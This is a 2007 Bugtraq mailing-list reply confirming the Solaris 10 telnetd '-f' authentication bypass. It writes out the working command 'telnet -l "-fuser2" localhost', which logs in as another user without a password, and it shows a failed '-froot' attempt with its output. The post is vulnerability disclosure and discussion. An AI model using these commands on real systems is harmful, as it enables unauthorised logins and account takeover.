[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Solaris telnet vulnberability - how many on your network?

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: Solaris telnet vulnberability - how many on your network?
From: Leandro Gelasi <leandro.gelasi@xxxxxxxxxx>
Date: Wed, 14 Feb 2007 11:41:17 +0100

On Monday 12 February 2007 07:00, Gadi Evron wrote:
> Update from HD Moore:
> "but this bug isnt -froot, its -fanythingbutroot =P"
Confirmed.

If the server permits logins from outside (maybe via SSH only - protection 
provided by a local or network) and has telnetd enabled any user can login  
as other user with no password. I mean:

$> ssh user1@xxxxxxxxxxxxxxxx
password: ********
user1@sol10_server>telnet -l "-fuser2" localhost
<no pass required>
user2@sol10_server>

On my Solaris 10 server I wasn't able to obtain root privileges this way, 
trying:

$>telnet -l "-froot" localhost (or IP from the local net)

I got:

Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Not on system console
Connection to localhost closed by foreign host.

It seems that root cannot login on not-system consoles. This server hosts 
SunRay Server Software 3.1, maybe the different configuration is coming from 
there.

See you

LG

--  
**************************************************************************
Leandro Gelasi
email : leandro.gelasi@xxxxxxxxxx
Gilles Villeneuve will live forever
**************************************************************************

References:
- Solaris telnet vulnberability - how many on your network?
  - From: Gadi Evron

Prev by Date: Cisco Security Advisory: Multiple Vulnerabilities in Firewall Services Module
Next by Date: [SECURITY] [DSA 1259-1] New fetchmail packages fix information disclosure
Previous by thread: Re: Solaris telnet vulnberability - how many on your network?
Next by thread: Re: Solaris telnet vulnberability - how many on your network?
Index(es):
- Date
- Thread